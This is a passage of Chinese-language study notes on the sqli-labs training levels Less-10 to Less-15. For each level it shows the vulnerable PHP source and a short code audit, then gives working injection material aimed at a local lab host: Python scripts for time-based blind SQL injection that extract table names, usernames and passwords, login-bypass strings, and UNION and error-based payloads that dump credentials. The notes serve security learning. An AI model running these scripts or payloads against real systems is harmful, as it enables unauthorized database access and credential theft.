  151. def length(num):
  152.     user_length = 0
  153.     while True:
  154.         param = "1' and if(length(substr((select username from users limit "+str(num)+",1),1))="+str(user_length)+",sleep(0.1),1) #"
  155.         t = time()
  156.         response = request.urlopen(url + parse.quote(param)).read().decode()
  158.         if (time() - t > 0.1):
  159.             #print(user_length)
  160.             return user_length
  161.             break
  162.         else:
  163.             user_length += 1
  164. def Name(value1,value2):
  165.     for n in range(num):
  166.         columns_name1 = columns_name2 = ""
  167.         for l  in range(length(n)): # 表的长度
  168.             for a in range(0,128): #爆破表
  169.                 param = "1' and if(ascii(substr((select "+value1+" from users limit "+str(n)+",1),"+str(l+1)+",1)) ="+str(a)+",sleep(0.1),1) #"
  170.                 t = time()
  171.                 response = request.urlopen(url + parse.quote(param))
  172.                 if (time() - t > 0.1 ):
  173.                     columns_name1 += chr(a)
  174.                     break
  176.             for a in range(0,128): #爆破表
  177.                 param = "1' and if(ascii(substr((select "+value2+" from users limit "+str(n)+",1),"+str(l+1)+",1)) ="+str(a)+",sleep(0.1),1) #"
  178.                 t = time()
  179.                 response = request.urlopen(url + parse.quote(param))
  180.                 if (time() - t > 0.1 ):
  181.                     columns_name2 += chr(a)
  182.                     break
  183.         print(columns_name1+":"+columns_name2)
  184. Name("username","password")

爆破成功

image.png

Less-10 (基于时间的双引号盲注)

和前面的时间盲注一样

审计代码

源码

  1. <?php
  2. //including the Mysql connect parameters.
  3. include("../sql-connections/sql-connect.php");
  4. error_reporting(0);
  6. // take the variables
  7. if(isset($_GET['id']))
  8. {
  9. $id=$_GET['id'];
  10. //logging the connection parameters to a file for analysis.
  11. $fp=fopen('result.txt','a');
  12. fwrite($fp,'ID:'.$id."\n");
  13. fclose($fp);
  15. // connectivity 
  17. $id = '"'.$id.'"';
  18. $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
  19. $result=mysql_query($sql);
  20. $row = mysql_fetch_array($result);
  22.     if($row)
  23.     {
  24.       echo '<font size="5" color="#FFFF00">';    
  25.       echo 'You are in...........';
  26.       echo "<br>";
  27.         echo "</font>";
  28.       }
  29.     else 
  30.     {
  32.     echo '<font size="5" color="#FFFF00">';
  33.     echo 'You are in...........';
  34.     //print_r(mysql_error());
  35.     //echo "You have an error in your SQL syntax";
  36.     echo "</br></font>";    
  37.     echo '<font color= "#0000ff" font size= 3>';    
  39.     }
  40. }
  41.     else { echo "Please input the ID as parameter with numeric value";}
  43. ?>

关键代码审计

  1. # 双引号拼接,且
  2. $sql="SELECT * FROM users WHERE id="$id" LIMIT 0,1";
  4. # 延时盲注
  5. if true:
  6.     输出('You are in...........')
  7. else:
  8.     输出('You are in...........')

时间盲注

  1. from urllib import request
  2. from urllib import parse
  3. from time import  time
  5. url = "http://sqli.pte.com/Less-10/?id=1"+'"'
  7. #1 查数据库
  8. database_length = 0
  9. while True:
  10.     param = " and if(length(database())="+str(database_length)+",sleep(0.1),1) #"
  11.     t = time()
  12.     response = request.urlopen(url + parse.quote(param))
  14.     if ( time() - t > 0.1 ):
  15.         print("DATABASE_LENGTH:"+str(database_length))
  16.         break
  17.     else:
  18.         database_length += 1
  21. db_name = ""
  22. for l in range(database_length):
  23.     for a in range(128):
  25.         param = " and if(ascii(substr(database(),"  +  str(l+1) +  "))="  +  str(a) + ",sleep(0.1),1) #"
  26.         t = time()
  27.         response = request.urlopen(url + parse.quote(param))
  29.         if (time()-t >0.1):
  30.             db_name += chr(a)
  31.             break
  32. print("[*]:"+db_name)
  34. '''
  35. #尝试二分法扫描
  36. db_name = ""
  37. for l in range(database_length):
  38.     a,b = 64,64
  39.     while True:
  40.         b = int(b/2)
  41.         param = " and ascii(substr(database(),"  +  str(l+1) +  "))<"  +  str(a) +  "#"
  42.         response = request.urlopen(url + parse.quote(param)).read().decode()
  43.         if (re.search("You are in",response)):
  44.             a -=b
  45.         else:
  46.             param = " and ascii(substr(database(),"+str(l+1)+")) ="+str(a)+" #"
  47.             response = request.urlopen(url + parse.quote(param)).read().decode()
  48.             if (re.search("You are in",response)):
  49.                 db_name += chr(a)
  50.                 break
  51.             else:
  52.                 a +=b
  53. print("db_name:"+ db_name)
  54. '''
  57. #2 查表数量
  58. table_num = 0
  60. while True:
  61.     param = " and if((select count(*) from information_schema.tables where table_schema=database())="+str(table_num)+",sleep(0.1),1) #"
  62.     t = time()
  63.     response = request.urlopen(url + parse.quote(param))
  64.     if (time() - t > 0.1 ):
  65.         print("table_num:"+str(table_num))
  66.         break
  67.     else:
  68.         table_num += 1
  70. # 查 表长度
  71. def ta_length(num):
  72.     table_length = 0
  73.     while True:
  74.         param = " and if(length(substr((select table_name from information_schema.tables where table_schema=database() limit "+str(num)+",1),1))="+str(table_length)+",sleep(0.1),1) #"
  75.         t = time()
  76.         response = request.urlopen(url + parse.quote(param))
  77.         if (time() - t > 0.1 ):
  78.             return table_length
  79.             break
  80.         else:
  81.             table_length += 1
  83. # 查表
  84. for n in range(table_num):
  85.     table_name =""
  86.     for l  in range(ta_length(n)): # 表的长度
  87.         for a in range(0,128): #爆破表
  88.             param = " and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit "+str(n)+",1),"+str(l+1)+",1)) ="+str(a)+",sleep(0.1),1) #"
  89.             t = time()
  90.             response = request.urlopen(url + parse.quote(param))
  91.             if (time() - t > 0.1 ):
  92.                 table_name += chr(a)
  93.                 break
  94.     print("table_name:" + table_name)
  97. # 3 查字段
  98. # 查字段个数
  99. columns_num = 0
  100. while True:
  101.     param = " and if((select count(*) from information_schema.columns where table_name='users')="+str(columns_num)+",sleep(0.1),1) #"
  102.     t = time()
  103.     response = request.urlopen(url + parse.quote(param))
  104.     if (time() - t > 0.1):
  105.         print("columns_name:"+str(columns_num))
  106.         break
  107.     else:
  108.         columns_num += 1
  110. # 查每个字段的长度
  111. def co_length(num):
  112.     columns_length = 0
  113.     while True:
  114.         param = " and if(length(substr((select column_name from information_schema.columns where table_name='users' limit "+str(num)+",1),1))="+str(columns_length)+",sleep(0.1),1) #"
  115.         t = time()
  116.         response = request.urlopen(url + parse.quote(param))
  118.         if (time() - t > 0.1):
  119.             return columns_length
  120.             break
  121.         else:
  122.             columns_length += 1
  123. # 查每个字段的值
  124. for n in range(columns_num):
  125.     columns_name =""
  126.     for l  in range(co_length(n)): # 表的长度
  127.         for a in range(0,128): #爆破表
  128.             param = " and if(ascii(substr((select column_name from information_schema.columns where table_name='users' limit "+str(n)+",1),"+str(l+1)+",1)) ="+str(a)+",sleep(0.1),1) #"
  129.             t = time()
  130.             response = request.urlopen(url + parse.quote(param))
  131.             if (time() - t > 0.1):
  132.                 columns_name += chr(a)
  133.                 break
  134.     print("table_name:" +columns_name)
  136. # 下载数据
  138. # 查 username
  139. num = 0
  140. while True:
  141.     param = " and if((select count(*) from users )= "+str(num)+",sleep(0.1),1)#"
  142.     t = time()
  143.     response = request.urlopen(url + parse.quote(param)).read().decode()
  145.     if (time() - t > 0.1):
  146.         print("num:"+str(num))
  147.         break
  148.     else:
  149.         num += 1
  151. def length(num):
  152.     user_length = 0
  153.     while True:
  154.         param = " and if(length(substr((select username from users limit "+str(num)+",1),1))="+str(user_length)+",sleep(0.1),1) #"
  155.         t = time()
  156.         response = request.urlopen(url + parse.quote(param)).read().decode()
  158.         if (time() - t > 0.1):
  159.             #print(user_length)
  160.             return user_length
  161.             break
  162.         else:
  163.             user_length += 1
  164. def Name(value1,value2):
  165.     for n in range(num):
  166.         columns_name1 = columns_name2 = ""
  167.         for l  in range(length(n)): # 表的长度
  168.             for a in range(0,128): #爆破表
  169.                 param = " and if(ascii(substr((select "+value1+" from users limit "+str(n)+",1),"+str(l+1)+",1)) ="+str(a)+",sleep(0.1),1) #"
  170.                 t = time()
  171.                 response = request.urlopen(url + parse.quote(param))
  172.                 if (time() - t > 0.1 ):
  173.                     columns_name1 += chr(a)
  174.                     break
  176.             for a in range(0,128): #爆破表
  177.                 param = " and if(ascii(substr((select "+value2+" from users limit "+str(n)+",1),"+str(l+1)+",1)) ="+str(a)+",sleep(0.1),1) #"
  178.                 t = time()
  179.                 response = request.urlopen(url + parse.quote(param))
  180.                 if (time() - t > 0.1 ):
  181.                     columns_name2 += chr(a)
  182.                     break
  183.         print(columns_name1+":"+columns_name2)
  184. Name("username","password")

爆破出结果
image.png

Less-11(基于错误的PSOT单引号字符)

审计代码

源码

  1. <?php
  2. //including the Mysql connect parameters.
  3. include("../sql-connections/sql-connect.php");
  4. error_reporting(0);
  6. // take the variables
  7. if(isset($_POST['uname']) && isset($_POST['passwd']))
  8. {
  9.     $uname=$_POST['uname'];
  10.     $passwd=$_POST['passwd'];
  12.     //logging the connection parameters to a file for analysis.
  13.     $fp=fopen('result.txt','a');
  14.     fwrite($fp,'User Name:'.$uname);
  15.     fwrite($fp,'Password:'.$passwd."\n");
  16.     fclose($fp);
  19.     // connectivity 
  20.     @$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
  21.     $result=mysql_query($sql);
  22.     $row = mysql_fetch_array($result);
  24.     if($row)
  25.     {
  26.           //echo '<font color= "#0000ff">';    
  28.           echo "<br>";
  29.         echo '<font color= "#FFFF00" font size = 4>';
  30.         //echo " You Have successfully logged in\n\n " ;
  31.         echo '<font size="3" color="#0000ff">';    
  32.         echo "<br>";
  33.         echo 'Your Login name:'. $row['username'];
  34.         echo "<br>";
  35.         echo 'Your Password:' .$row['password'];
  36.         echo "<br>";
  37.         echo "</font>";
  38.         echo "<br>";
  39.         echo "<br>";
  40.         echo '<img src="../images/flag.jpg"  />';    
  42.           echo "</font>";
  43.       }
  44.     else  
  45.     {
  46.         echo '<font color= "#0000ff" font size="3">';
  47.         //echo "Try again looser";
  48.         print_r(mysql_error());
  49.         echo "</br>";
  50.         echo "</br>";
  51.         echo "</br>";
  52.         echo '<img src="../images/slap.jpg" />';    
  53.         echo "</font>";  
  54.     }
  55. }
  57. ?>

关键代码审计

  1. # POST 方式接受变量
  2. $uname=$_POST['uname'];
  3. $passwd=$_POST['passwd'];
  5. # 使用单引号拼接 SQL
  6. @$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
  8. if true:
  9.     输出查询的信息
  10. else:
  11.     print_r(mysql_error());

万能密码

  1. # 注释掉 passwd 来登录
  2. uname=admin'--+&passwd=&submit=Submit
  3. uname=admin'#&passwd=&submit=Submit
  5. # 注释后面语句 并 添加一个永真条件
  6. uname=admin&passwd=1' or 1--+&submit=Submit
  7. uname=admin&passwd=1'||1--+&submit=Submit
  8. uname=admin&passwd=1' or 1#&submit=Submit
  9. uname=admin&passwd=1'||1#&submit=Submit
  11. # 闭合后面语句 并 添加一个永真条件
  12. uname=admin&passwd=1'or'1'='1&submit=Submit
  13. uname=admin&passwd=1'||'1'='1&submit=Submit

登录成功
image.png

Union注入

  1. passwd=1'union select 1,(SELECT GROUP_CONCAT(username,password) FROM users) #&Submit=Submit&uname=admin

image.png

报错注入

  1. passwd==1'AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(CONCAT(username,password) AS CHAR),0x7e)) FROM users LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)#
  2. &Submit=Submit
  3. &uname=admin

image.png

其实POST注入和GET注入对比下来,注入原理是不变的,变的是位置由GET变成了POST,导致不能直接在url里注入,需要专门的工具burp suite或其他工具更改注入点的参数,达成成功注入。

Less-12(基于错误的双引号POST型字符变形注入)

审计代码

源码

  1. <?php
  2. //including the Mysql connect parameters.
  3. include("../sql-connections/sql-connect.php");
  4. error_reporting(0);
  6. // take the variables
  7. if(isset($_POST['uname']) && isset($_POST['passwd']))
  8. {
  9.     $uname=$_POST['uname'];
  10.     $passwd=$_POST['passwd'];
  12.     //logging the connection parameters to a file for analysis.
  13.     $fp=fopen('result.txt','a');
  14.     fwrite($fp,'User Name:'.$uname."\n");
  15.     fwrite($fp,'Password:'.$passwd."\n");
  16.     fclose($fp);
  19.     // connectivity
  20.     $uname='"'.$uname.'"';
  21.     $passwd='"'.$passwd.'"'; 
  22.     @$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
  23.     $result=mysql_query($sql);
  24.     $row = mysql_fetch_array($result);
  26.     if($row)
  27.     {
  28.           //echo '<font color= "#0000ff">';    
  30.           echo "<br>";
  31.         echo '<font color= "#FFFF00" font size = 4>';
  32.         //echo " You Have successfully logged in " ;
  33.         echo '<font size="3" color="#0000ff">';    
  34.         echo "<br>";
  35.         echo 'Your Login name:'. $row['username'];
  36.         echo "<br>";
  37.         echo 'Your Password:' .$row['password'];
  38.         echo "<br>";
  39.         echo "</font>";
  40.         echo "<br>";
  41.         echo "<br>";
  42.         echo '<img src="../images/flag.jpg"   />';    
  44.           echo "</font>";
  45.       }
  46.     else  
  47.     {
  48.         echo '<font color= "#0000ff" font size="3">';
  49.         //echo "Try again looser";
  50.         print_r(mysql_error());
  51.         echo "</br>";
  52.         echo "</br>";
  53.         echo "</br>";
  54.         echo '<img src="../images/slap.jpg"   />';    
  55.         echo "</font>";  
  56.     }
  57. }
  59. ?>

关键代码审计

  1. # POST 方式接受变量
  2. $uname=$_POST['uname'];
  3. $passwd=$_POST['passwd'];
  5. # 使用双引号括号拼接 SQL
  6. @$sql="SELECT username, password FROM users WHERE username=("$uname") and password=("$passwd") LIMIT 0,1";
  8. if true:
  9.     输出查询的信息
  10. else:
  11.     print_r(mysql_error());

万能密码

  1. passwd=123456&Submit=Submit&uname=admin ") --+

image.png

Union注入

  1. passwd=1") union select 1,(SELECT GROUP_CONCAT(username,password) FROM users) #&Submit=Submit&uname=admin

image.png

Less-13(POST单引号变形双注入)

审计代码

源码

  1. <?php
  2. //including the Mysql connect parameters.
  3. include("../sql-connections/sql-connect.php");
  4. error_reporting(0);
  6. // take the variables
  7. if(isset($_POST['uname']) && isset($_POST['passwd']))
  8. {
  9.     $uname=$_POST['uname'];
  10.     $passwd=$_POST['passwd'];
  12.     //logging the connection parameters to a file for analysis.
  13.     $fp=fopen('result.txt','a');
  14.     fwrite($fp,'User Name:'.$uname."\n");
  15.     fwrite($fp,'Password:'.$passwd."\n");
  16.     fclose($fp);
  19.     // connectivity 
  20.     @$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";
  21.     $result=mysql_query($sql);
  22.     $row = mysql_fetch_array($result);
  24.     if($row)
  25.     {
  26.           //echo '<font color= "#0000ff">';    
  28.           echo "<br>";
  29.         echo '<font color= "#FFFF00" font size = 4>';
  30.         //echo " You Have successfully logged in " ;
  31.         echo '<font size="3" color="#0000ff">';    
  32.         echo "<br>";
  33.         //echo 'Your Login name:'. $row['username'];
  34.         //echo "<br>";
  35.         //echo 'Your Password:' .$row['password'];
  36.         //echo "<br>";
  37.         echo "</font>";
  38.         echo "<br>";
  39.         echo "<br>";
  40.         echo '<img src="../images/flag.jpg"   />';    
  42.           echo "</font>";
  43.       }
  44.     else  
  45.     {
  46.         echo '<font color= "#0000ff" font size="3">';
  47.         //echo "Try again looser";
  48.         print_r(mysql_error());
  49.         echo "</br>";
  50.         echo "</br>";
  51.         echo "</br>";
  52.         echo '<img src="../images/slap.jpg"   />';    
  53.         echo "</font>";  
  54.     }
  55. }
  57. ?>

关键代码审计

  1. # POST 方式接受变量
  2. $uname=$_POST['uname'];
  3. $passwd=$_POST['passwd'];
  5. # 使用单引号和括号拼接 SQL
  6. @$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";
  8. if true:
  9.     无有效输出
  10. else:
  11.     print_r(mysql_error());

报错注入

改变偏移量 limit 0,1中的0的值, 就可以查看数据库内username和password的信息了

  1. passwd==1') AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(CONCAT(username,password) AS CHAR),0x7e)) FROM users LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)#
  2. &Submit=Submit
  3. &uname=admin

注入成功
image.png

Less-14(POST双引号变形双注入)

审计代码

源码

  1. <?php
  2. //including the Mysql connect parameters.
  3. include("../sql-connections/sql-connect.php");
  4. error_reporting(0);
  6. // take the variables
  7. if(isset($_POST['uname']) && isset($_POST['passwd']))
  8. {
  9.     $uname=$_POST['uname'];
  10.     $passwd=$_POST['passwd'];
  12.     //logging the connection parameters to a file for analysis.
  13.     $fp=fopen('result.txt','a');
  14.     fwrite($fp,'User Name:'.$uname."\n");
  15.     fwrite($fp,'Password:'.$passwd."\n");
  16.     fclose($fp);
  19.     // connectivity
  20.     $uname='"'.$uname.'"';
  21.     $passwd='"'.$passwd.'"'; 
  22.     @$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";
  23.     $result=mysql_query($sql);
  24.     $row = mysql_fetch_array($result);
  26.     if($row)
  27.     {
  28.           //echo '<font color= "#0000ff">';    
  30.           echo "<br>";
  31.         echo '<font color= "#FFFF00" font size = 4>';
  32.         //echo " You Have successfully logged in " ;
  33.         echo '<font size="3" color="#0000ff">';    
  34.         echo "<br>";
  35.         //echo 'Your Login name:'. $row['username'];
  36.         //echo "<br>";
  37.         //echo 'Your Password:' .$row['password'];
  38.         //echo "<br>";
  39.         echo "</font>";
  40.         echo "<br>";
  41.         echo "<br>";
  42.         echo '<img src="../images/flag.jpg" />';    
  44.           echo "</font>";
  45.       }
  46.     else  
  47.     {
  48.         echo '<font color= "#0000ff" font size="3">';
  49.         //echo "Try again looser";
  50.         print_r(mysql_error());
  51.         echo "</br>";
  52.         echo "</br>";
  53.         echo "</br>";
  54.         echo '<img src="../images/slap.jpg"  />';    
  55.         echo "</font>";  
  56.     }
  57. }
  59. ?>

关键代码审计

  1. # POST 方式接受变量
  2. $uname=$_POST['uname'];
  3. $passwd=$_POST['passwd'];
  5. # 使用双引号拼接 SQL
  6. @$sql="SELECT username, password FROM users WHERE username="$uname" and password="$passwd" LIMIT 0,1";
  8. if true:
  9.     无有效输出
  10. else:
  11.     print_r(mysql_error());

报错注入

  1. passwd==1') AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(CONCAT(username,password) AS CHAR),0x7e)) FROM users LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)#
  2. &Submit=Submit
  3. &uname=admin

image.png

Less-15(基于bool型/时间延迟单引号POST型盲注)

审计代码

源码

  1. <?php
  2. //including the Mysql connect parameters.
  3. include("../sql-connections/sql-connect.php");
  4. error_reporting(0);
  6. // take the variables
  7. if(isset($_POST['uname']) && isset($_POST['passwd']))
  8. {
  9.     $uname=$_POST['uname'];
  10.     $passwd=$_POST['passwd'];
  12.     //logging the connection parameters to a file for analysis.
  13.     $fp=fopen('result.txt','a');
  14.     fwrite($fp,'User Name:'.$uname);
  15.     fwrite($fp,'Password:'.$passwd."\n");
  16.     fclose($fp);
  19.     // connectivity 
  20.     @$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
  21.     $result=mysql_query($sql);
  22.     $row = mysql_fetch_array($result);
  24.     if($row)
  25.     {
  26.           //echo '<font color= "#0000ff">';    
  28.           echo "<br>";
  29.         echo '<font color= "#FFFF00" font size = 4>';
  30.         //echo " You Have successfully logged in\n\n " ;
  31.         echo '<font size="3" color="#0000ff">';    
  32.         echo "<br>";
  33.         //echo 'Your Login name:'. $row['username'];
  34.         echo "<br>";
  35.         //echo 'Your Password:' .$row['password'];
  36.         echo "<br>";
  37.         echo "</font>";
  38.         echo "<br>";
  39.         echo "<br>";
  40.         echo '<img src="../images/flag.jpg"  />';    
  42.           echo "</font>";
  43.       }
  44.     else  
  45.     {
  46.         echo '<font color= "#0000ff" font size="3">';
  47.         //echo "Try again looser";
  48.         //print_r(mysql_error());
  49.         echo "</br>";
  50.         echo "</br>";
  51.         echo "</br>";
  52.         echo '<img src="../images/slap.jpg"   />';    
  53.         echo "</font>";  
  54.     }
  55. }
  57. ?>

关键代码审计

  1. # POST 方式接受变量
  2. $uname=$_POST['uname'];
  3. $passwd=$_POST['passwd'];
  5. # 使用单引号拼接 SQL
  6. @$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
  8. if true:
  9.     无有效输出信息
  10. else:
  11.     无有效输出信息

时间盲注

除了sqlmap之外还可以自己编写python脚本

  1. '''
  2. 看一下脚本
  3. - 脚本跑
  4.  理解扫描的方式: 确定数据库的数量,确定数据库的长度,确定数据库
  5.  我们可以通过大于数据库的个数这样就不用去判断数据库的长度,之后长度也可以通过时间报错信息去判断,在加上判断 是否是这个字符 一共需要三层循环就可以解决
  6.   这里有两种方式去判断 ,使用ascii判断 ,或者通过mid 截断去判断。
  7.    data = {'uname': "admin'and If((mid((select schema_name from information_schema.schemata limit %d,1),%d,1))='%s',sleep(0.1),1)#" % ( i, j, str), 'passwd': "1"}
  8.    data = {'uname': "admin'and If((mid((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1))='%s',sleep(0.1),1)#" % ( i, j, str), 'passwd': "1"}
  9.    data = {'uname': "admin'and If((mid((select column_name from information_schema.columns where table_name='users' limit %d,1),%d,1))='%s',sleep(0.1),1)#" % ( i, j, str), 'passwd': "1"}
  10.    data = {'uname': "admin'and If((mid((select username from users limit %d,1),%d,1))='%s',sleep(0.1),1)#" % ( i, j, str), 'passwd': "1"}
  11.    data = {'uname': "admin'and If((mid((select password from users limit %d,1),%d,1))='%s',sleep(0.1),1)#" % ( i, j, str), 'passwd': "1"}
  13. '''
  14. #coding:utf-8
  15. import requests
  16. from time import time
  17. url = "http://sqli.pte.com/Less-15/"
  18. char = "abcdefghijklmnopqrstuvwxyz_"
  19. print("start!")
  20. for i in range(0,10):
  21.     database = ""
  22.     for j in range(1,20):
  23.         for str in char:
  25.             time1 = time()
  26.             data = {'uname': "admin'and If((mid((select password from users limit %d,1),%d,1))='%s',sleep(0.1),1)#" % (i, j, str), 'passwd': "1"}
  27.             res = requests.post(url,data=data)
  29.             time2 = time()
  31.             if (time2-time1 > 0.1 ):
  32.                 database += str
  33.                 #print(database)
  34.                 break
  35.     print("the %d database: "% (i+1))
  36.     print(database)
  37. print("end!")

注入成功
image.png

断更!

原因是看了大佬的一篇博客,学习中的笔记如果不是高效的就不必要去记,我陷入了这个误区每次笔记都要想着排版,说明清楚,花费了很大一部分时间去思考。然而该思考的不是怎么记笔记,而是怎么去积累安全经验和基础知识,所以以后的笔记只会记录一些我觉得有价值记录的东西!